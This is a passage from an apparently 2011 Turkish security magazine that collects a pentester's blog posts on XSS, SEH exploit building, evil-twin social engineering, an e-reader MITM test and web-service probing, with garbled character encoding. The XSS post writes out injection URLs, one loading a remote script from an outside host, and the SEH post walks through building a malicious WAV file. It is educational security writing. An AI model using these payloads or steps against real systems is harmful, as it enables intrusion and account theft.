Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 18: Hack 4 Career - 2011

18

Siteler arası betik ccedilalıştırma zafiyeti uumlccedile ayrılmaktadır

bull Kalıcı (persistentstored) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktansonra daha sonra iccedileriğin internet tarayıcısı tarafından her ccedilağrılmasında (oumlrnek olarak foruma yazılmış bir mesajı veya bir haberinaltına yazılan bir yorumu duumlşuumlnuumln) tekrar ve tekrar kullanıcıya sunulur

bull Kalıcı olmayan (non-persistentreflected) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanınayazılmadığı iccedilin sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı uumlzerinden size goumlnderilmiş bir bağlantıadresine (URL) tıkladığınızı duumlşuumlnuumln) ccedilağrılması ile kullanıcıya sunulur

bull DOM tabanlı İstemci tarafında bulunan kodun (javascript) DOMa (Document Object ModelBelge Nesne Yapısıdır) muumldahaleetmesiyle ortaya ccedilıkmaktadır DOM tabanlı XSSin en guumlzel yanı istemci tarafında olduğu iccedilin sunucuya herhangi bir paketgoumlnderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi muumlmkuumln olmaz

XSS zafiyetinin sadece kutucuk ccedilıkartarak ccedilerez (cookie) ccedilalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğinedair en guumlzel oumlrneği Apachenin geccedilen sene başına gelenlerden oumlğrenebilirsiniz 2010 yılında art niyetli kişiler tarafından Apachesunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunuculardaroot yetkisine sahip olmaları ile son buldu Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylıbilgiye buradan ulaşabilirsiniz

XSS zafiyeti ile ilgili bir oumlrnek uumlzerinden geccedilmezsek anlaşılması guumlccedil olacağı iccedilin ufak bir oumlrnek uumlzerinden hızlıca ilerleyelim

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesininaratılması sonucunda sunucu tarafından doumlnen yanıtı goumlreceksiniz Uygulama tarafında tfSearch parametresinde girdi kontroluuml (koumltuumlkarakter filtrelemesi) yapılmadığı iccedilin XSS zafiyetine yol accedilmaktadır

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır)

httptestaspvulnwebcomSearchasptfSearch=Mert

XSS zafiyetini istismar ederek kullanım 1 (alarm kutucuğu)

httptestaspvulnwebcomSearchasptfSearch=ltscriptgtalert(XSS)ltscriptgt

XSS zafiyetini istismar ederek kullanım 2 (başka bir siteden zararlı javascript kodu ccedilağırma)

httptestaspvulnwebcomSearchasptfSearch=ltscript SRC=httphackersorgxssjsgtltscriptgt

Unutmayın XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu ccedilağırmanızı sağlayan art niyetli kişiler internettarayıcınızı uzaktan youmlneterek tuumlm tuş kayıtlarınızı izleyebilir ziyaret ettiğiniz siteleri tespit edebilir Metasploit ile internet tarayıcınızınzafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin youmlnetim sayfasındaki CSRF zafiyetini istismar ederek youmlneticişifrenizi değiştirerek modeminizi kontrol edebilir

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini goumlsteren videoyu şiddetle izlemenizi tavsiye ederim

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese guumlvenli guumlnler dilerim

5 Dakikada SEH İstismar Aracı (Exploit) HazırlamaSource httpswwwmertsaricacomtestBy MS on July 19th 2011

Yazılarımı takip edenleriniz daha oumlnce SEH İstismarını konu olan bir yazı yazdığımı hatırlayacaktır Buguumlnkuuml yazımda SEH istismararacının Immunity Debugger uumlzerinde ccedilalışan pvefindaddrpy eklentisi ile nasıl kısa bir suumlre iccedilinde hazırlanabileceğini goumlreceğiz

Immunity Debugger istismar aracı (exploit) hazırlamak zararlı yazılım (malware) analizi ve tersine muumlhendislik yapmak isteyenlericcedilin oldukccedila başarılı bir hata ayıklama (debugger) aracıdır Sade ve anlaşılır arayuumlzuuml komut satırı desteği ve Python ile betik (script)hazırlamaya imkan tanıyan desteği sayesinde masauumlstuumlmuumln vazgeccedililmezleri arasında yer almaktadır

pvefindaddrpy eklentisi Peter Van Eeckhoutte tarafından istismar aracı hazırlamak iccedilin oumlzel olarak tasarlanmış ve iccedilinde paternoluşturmaktan otomatik istismar kodu şablonu oluşturmaya kadar bir ccedilok oumlzelliğe sahiptir Eklentinin kullanımı ile ilgili detaylı bilgiyeburadan ulaşabilirsiniz

Adımlara geccedilmeden oumlnce ilk olarak sisteminizde yuumlkluuml olan Immunity Debugger aracı iccedilin pvefindaddrpy aracını buradan indirerek CProgram FilesImmunity IncImmunity DebuggerPyCommands klasoumlruuml altına kopyalayın

İstismar edilecek araccedil olarak daha oumlnceki yazımda adı geccedilen Free WMA MP3 Converter v11 aracını kullanacağız

Immunity Debugger aracını ccedilalıştırdıktan sonra File -gt Open menuumlsuumlnden CProgram FilesFree WMA MP3 ConverterWmpconexearacını seccedilelim ve Open butonuna basalım F9 tuşuna basarak programı ccedilalıştıralım Komut satırında pvefindaddr pattern_create5000 yazarak 5000 bayt buumlyuumlkluumlğuumlnde bir patern oluşturalım Oluşturulan patern CProgram FilesImmunity IncImmunity Debuggermspatterntxt dosyası olarak kayıt edilmektedir

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

